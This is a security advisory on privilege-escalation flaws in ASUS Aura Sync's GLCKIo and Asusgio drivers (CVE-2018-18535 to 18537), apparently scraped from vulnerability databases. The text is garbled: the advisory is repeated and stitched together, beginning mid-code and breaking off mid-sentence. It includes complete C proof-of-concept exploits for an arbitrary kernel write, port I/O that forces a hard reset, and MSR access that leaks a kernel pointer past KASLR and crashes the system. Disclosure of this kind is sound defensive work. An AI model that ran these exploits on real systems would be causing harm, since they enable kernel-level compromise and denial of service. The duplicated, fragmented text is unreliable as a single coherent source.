#pragma pack (push,1) typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) } ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082); printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR); printf("press ENTER for instant BSOD\n"); getchar(); a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222); CloseHandle(ghDriver); } -----/ *8. *Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'. *9. *References** [1] https://www.asus.com/support *10. *About SecureAuth Labs** SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com. *11. *About SecureAuth** SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com *12. *Disclaimer** The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

The GLCKIo and Asusgio low-level drivers in ASUS Aura Sync v1.07.22 and earlier expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. ASUS Aura Sync Contains vulnerabilities in authorization, authority, and access control.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Asus Aura Sync is prone to multiple arbitrary code-execution vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. ASUS Aura Sync 1.07.22 is vulnerable; other versions may also be affected. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASUS Drivers Elevation of Privilege Vulnerabilities *1. *Advisory Information** Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release *2. *Vulnerability Information** Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535 *3. *Vulnerability Description** ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization. *4. *Vulnerable Packages** . *5. *Vendor Information, Solutions and Workarounds** The vendor did not provide fixes or workaround information. *6. *Credits** These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. *7.1. *Arbitrary ring0 write** [CVE-2018-18537] There is a path in the processing of IOCTL_GLCKIO_READPORT (0x80102050) on GLCKIo leading to write of arbitrary DWORD to an arbitrary address. /----- .text:FFFFF800B09F13FE loc_FFFFF800B09F13FE: .text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE .text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE .text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write! .text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp] .text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 .text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D -----/ Proof of Concept: /----- #include <windows.h> HANDLE ghDriver = 0; #define IOCTL_GLCKIO_VMWRITE 0x80102050 typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE; BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address STRUCT_GLCKIO_VMWRITE mystructOut = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n"); if (!InitDriver()) { exit(0); } printf("press ENTER for instant BSOD\n"); getchar(); ArbitraryWriteDWORD(0, 0xffffffff); CloseHandle(ghDriver); return 0; } -----/ *7.2. /----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. // Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?) #include "stdafx.h" #include <windows.h> // for \\.\glckio #define IOCTL_GLCKIO_WRITEPORT 0x80102054 #define IOCTL_GLCKIO_READPORT 0x80102050 // for \\.\Asusgio #define IOCTL_ASIO_PORTREADB 0xA0406400 #define IOCTL_ASIO_PORTWRITEB 0xA040A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { ASIO = 1, GLCKIO, }; typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT; typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) } BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) } BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) } BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::ASIO: { gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB; } break; case DriverEnum::GLCKIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB; } gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB; break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/ *7.3. *MSR Register access** [CVE-2018-18535] Asusgio exposes a functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. Proof of Concept: /----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!) #include <windows.h> // for \\.\Asusgio #define IOCTL_ASIO_RDMSR 0xA0406458 #define IOCTL_ASIO_WRMSR 0xA040A45C HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) } ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082); printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR); printf("press ENTER for instant BSOD\n"); getchar(); a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222); CloseHandle(ghDriver); } -----/ *8. *Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'. *9. *References** [1] https://www.asus.com/support *10. *About SecureAuth Labs** SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com. *11. *About SecureAuth** SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com *12. *Disclaimer** The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

The GLCKIo low-level driver in ASUS Aura Sync v1.07.22 and earlier exposes a path to write an arbitrary DWORD to an arbitrary address. ASUS Aura Sync Contains vulnerabilities related to security features.Information may be tampered with. Successfully exploiting these issues may allow an attacker to execute arbitrary code in the context of the affected application and gain elevated privileges. Failed exploits will result in denial-of-service conditions. SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ ASUS Drivers Elevation of Privilege Vulnerabilities *1. *Advisory Information** Title: ASUS Drivers Elevation of Privilege Vulnerabilities Advisory ID: CORE-2017-0012 Advisory URL: http://www.secureauth.com/labs/advisories/asus-drivers-elevation-privilege-vulnerabilities Date published: 2018-12-18 Date of last update: 2018-12-18 Vendors contacted: Asus Release mode: User release *2. *Vulnerability Information** Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient Access Control [CWE-782] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-18537, CVE-2018-18536, CVE-2018-18535 *3. *Vulnerability Description** ASUS offers several drivers and utilities [1] in order to give the user more control over certain settings and functions of the motherboard. In particular, ASUS Aura Sync takes RGB lighting beyond the checkbox, combining and controlling the LEDs of all your Aura-enabled products from a single application to achieve perfect, synchronized harmony. From motherboards and RGB strips to graphics cards and beyond, Aura Sync enables a veritable symphony of light for ultimate personalization. *4. *Vulnerable Packages** . *5. *Vendor Information, Solutions and Workarounds** The vendor did not provide fixes or workaround information. *6. *Credits** These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** Aura Sync is ASUS's command software for all their line of recent RGB lighting enabled devices (motherboards/graphics cards/keyboards/mice/etc). The main subject of this advisory are two of the device drivers installed/loaded by the Aura Sync application. From now on addressed as "Asusgio" and "GLCKIo". Default installation allows non-privileged user processes (even running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found. *7.1. /----- .text:FFFFF800B09F13FE loc_FFFFF800B09F13FE: .text:FFFFF800B09F13FE mov rax, [rsp+0C8h+var_38] ; CONTROLLED VALUE .text:FFFFF800B09F1406 mov ecx, [rsp+0C8h+var_56] ; CONTROLLED VALUE .text:FFFFF800B09F140A mov [rax], ecx ; Arbitrary DWORD sized write! .text:FFFFF800B09F140C mov rax, [rsp+0C8h+Irp] .text:FFFFF800B09F1414 mov qword ptr [rax+38h], 4 .text:FFFFF800B09F141C jmp short loc_FFFFF800B09F142D -----/ Proof of Concept: /----- #include <windows.h> HANDLE ghDriver = 0; #define IOCTL_GLCKIO_VMWRITE 0x80102050 typedef struct _STRUCT_GLCKIO_VMWRITE { WORD unk0; DWORD unk1_1; WORD unk1_2; ULONG64 unk2; ULONG64 unk3; ULONG64 unk4; ULONG64 unk5; ULONG64 unk6; } STRUCT_GLCKIO_VMWRITE; BOOL ArbitraryWriteDWORD(ULONG64 dest, DWORD value) { STRUCT_GLCKIO_VMWRITE mystructIn = { 0 }; mystructIn.unk0 = 0xf11; mystructIn.unk1_1 = value; // value mystructIn.unk5 = dest; // address STRUCT_GLCKIO_VMWRITE mystructOut = { 0 }; DWORD returned = 0; DeviceIoControl(ghDriver, IOCTL_GLCKIO_VMWRITE, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)&mystructOut, sizeof(mystructOut), &returned, NULL); return BOOL(returned); } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\GLCKIo", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to GLCKIo driver - GetLastError:%d\n", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (arbitrary ring0 write)\n"); if (!InitDriver()) { exit(0); } printf("press ENTER for instant BSOD\n"); getchar(); ArbitraryWriteDWORD(0, 0xffffffff); CloseHandle(ghDriver); return 0; } -----/ *7.2. *Port mapped I/O access** [CVE-2018-18536] Both GLCKIo and Asusgio expose a functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges. /----- // This harmless PoC only reboots the PC, much more sinister stuff // would also be possible by abusing this functionality. // Compile for 32bit!!! Asusgio apparently has a bug preventing this // functionality to work unless IoIs32bitProcess == TRUE. They set rdx // as a pointer instead of a port number on the in/out instruction... // and they ONLY do this incorrectly in the x64 process specific code.(!?) #include "stdafx.h" #include <windows.h> // for \\.\glckio #define IOCTL_GLCKIO_WRITEPORT 0x80102054 #define IOCTL_GLCKIO_READPORT 0x80102050 // for \\.\Asusgio #define IOCTL_ASIO_PORTREADB 0xA0406400 #define IOCTL_ASIO_PORTWRITEB 0xA040A440 HANDLE ghDriver = 0; typedef BYTE(*fnPMIOReadB)(WORD port); typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value); #pragma pack (push,1) typedef struct { DWORD DriverIndex; // DriverEnum index BYTE DeviceName[MAX_PATH]; fnPMIOReadB pPMIOReadB; fnPMIOWriteB pPMIOWriteB; } AutoConfigStruct; AutoConfigStruct gConfig = { 0 }; enum DriverEnum { ASIO = 1, GLCKIO, }; typedef struct _ASIO_PORTIO_STRUCT { DWORD port; ULONG64 value; } ASIO_PORTIO_STRUCT; typedef struct _GLCKIO_PORTIO_STRUCT { WORD port; DWORD value; DWORD datalen; } GLCKIO_PORTIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ BYTE outbuffer[0x30] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ BYTE GLCKIO_PMIOReadB(WORD port) { GLCKIO_PORTIO_STRUCT inbuffer = { port, 0, 1}; IOCTLMACRO(IOCTL_GLCKIO_READPORT, 10) } BYTE GLCKIO_PMIOWriteB(WORD port, BYTE value) { GLCKIO_PORTIO_STRUCT inbuffer = { port, value, 1 }; IOCTLMACRO(IOCTL_GLCKIO_WRITEPORT, 10) } BYTE ASIO_PMIOReadB(WORD port) { ASIO_PORTIO_STRUCT inbuffer = { port, 0 }; IOCTLMACRO(IOCTL_ASIO_PORTREADB, 4) } BYTE ASIO_PMIOWriteB(WORD port, BYTE value) { ASIO_PORTIO_STRUCT inbuffer = { port, value }; IOCTLMACRO(IOCTL_ASIO_PORTWRITEB, 5) } void Reboot() { BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6; gConfig.pPMIOWriteB(0xcf9, cf9 | 2); Sleep(50); gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe); Sleep(50); } BOOL InitDriver() { char *szDeviceNames[] = { "\\\\.\\Asusgio" , "\\\\.\\GLCKIo" }; BYTE i = 0; for (i = 0; i<2; i++) { ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError()); continue; } gConfig.DriverIndex = i+1; memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH-1); break; } switch (gConfig.DriverIndex) { case DriverEnum::ASIO: { gConfig.pPMIOReadB = (fnPMIOReadB)ASIO_PMIOReadB; gConfig.pPMIOWriteB = (fnPMIOWriteB)ASIO_PMIOWriteB; } break; case DriverEnum::GLCKIO: { gConfig.pPMIOReadB = (fnPMIOReadB)GLCKIO_PMIOReadB; } gConfig.pPMIOWriteB = (fnPMIOWriteB)GLCKIO_PMIOWriteB; break; default: break; } return gConfig.DriverIndex ? TRUE : FALSE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (PMIO access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver); printf("press ENTER for hard reset..."); getchar(); Reboot(); CloseHandle(ghDriver); } -----/ *7.3. *MSR Register access** [CVE-2018-18535] Asusgio exposes a functionality to read and write Machine Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code. Proof of Concept: /----- // This PoC demonstrates insecure access to MSRs by reading IA32_LSTAR // register value (leaks a kernel function pointer bypassing KASLR) and // then writing garbage to it (instant BSOD!) #include <windows.h> // for \\.\Asusgio #define IOCTL_ASIO_RDMSR 0xA0406458 #define IOCTL_ASIO_WRMSR 0xA040A45C HANDLE ghDriver = 0; #pragma pack (push,1) typedef struct _ASIO_MSRIO_STRUCT { DWORD reg; ULONG64 value; } ASIO_MSRIO_STRUCT; #pragma pack(pop) #define IOCTLMACRO(iocontrolcode, size) \ ULONG64 outbuffer[2] = { 0 }; \ DWORD returned = 0; \ DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \ return outbuffer[0]; \ ULONG64 ASIO_RDMSR(DWORD reg) { ASIO_MSRIO_STRUCT inbuffer = { reg }; IOCTLMACRO(IOCTL_ASIO_RDMSR, 4) } ULONG64 ASIO_WRMSR(DWORD reg, ULONG64 value) { ASIO_MSRIO_STRUCT inbuffer = { reg, value }; IOCTLMACRO(IOCTL_ASIO_WRMSR, 12) } BOOL InitDriver() { ghDriver = CreateFile("\\\\.\\Asusgio", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (ghDriver == INVALID_HANDLE_VALUE) { printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", "\\\\.\\Asusgio", GetLastError()); return FALSE; } return TRUE; } int _tmain(int argc, _TCHAR* argv[]) { printf("ASUS Aura Sync PoC (MSR access)\n"); if (!InitDriver()) { printf("InitDriver failed! - aborting...\n"); exit(0); } ULONG64 IA32_LSTAR = ASIO_RDMSR(0xC0000082); printf("IA32_LSTAR: %llx (should be nt!KiSystemCall64)\n", IA32_LSTAR); printf("press ENTER for instant BSOD\n"); getchar(); a = ASIO_WRMSR(0xC0000082, 0xffff1111ffff2222); CloseHandle(ghDriver); } -----/ *8. *Report Timeline** 2017-11-27: SecureAuth sent an initial notification to ASUS, asking for GPG keys. 2017-12-14: SecureAuth sent a second notification to ASUS. 2018-01-29: SecureAuth sent a third notification to ASUS. 2018-01-30: Asus acknowledged SecureAuth's e-mail and asked for a report with technical information. 2018-01-31: SecureAuth sent Asus a draft version of the advisory. 2018-02-07: SecureAuth requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-14: SecureAuth again requested an update from Asus regarding the reported vulnerabilities and a tentative schedule. 2018-02-21: Asus acknowledged SecureAuth's draft report and asked for time for internal investigations. 2018-02-21: Asus answered saying that they were planning to update Aura in April. 2018-02-21: SecureAuth thanked Asus's feedback and requested a regular contact until the Auras update. 2018-03-19: SecureAuth asked for a status update. 2018-03-26: SecureAuth asked for a status update again. 2018-03-26: SecureAuth asked Asus to confirm if this new version had been already released. 2018-04-03: SecureAuth requested a status update. 2018-04-16: SecureAuth requested a confirmation for Asus. 2018-04-23: SecureAuth requested a confirmation for Asus again. However, this version didn't address the reported vulnerabilities. For that reason, SecureAuth requested a clarification about the case. In this context, SecureAuth requested a new clarification. 2018-07-03: SecureAuth requested a status update. 2018-12-18: Advisory CORE-2017-0012 published as 'user release'. *9. *References** [1] https://www.asus.com/support *10. *About SecureAuth Labs** SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning. Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com. *11. *About SecureAuth** SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit 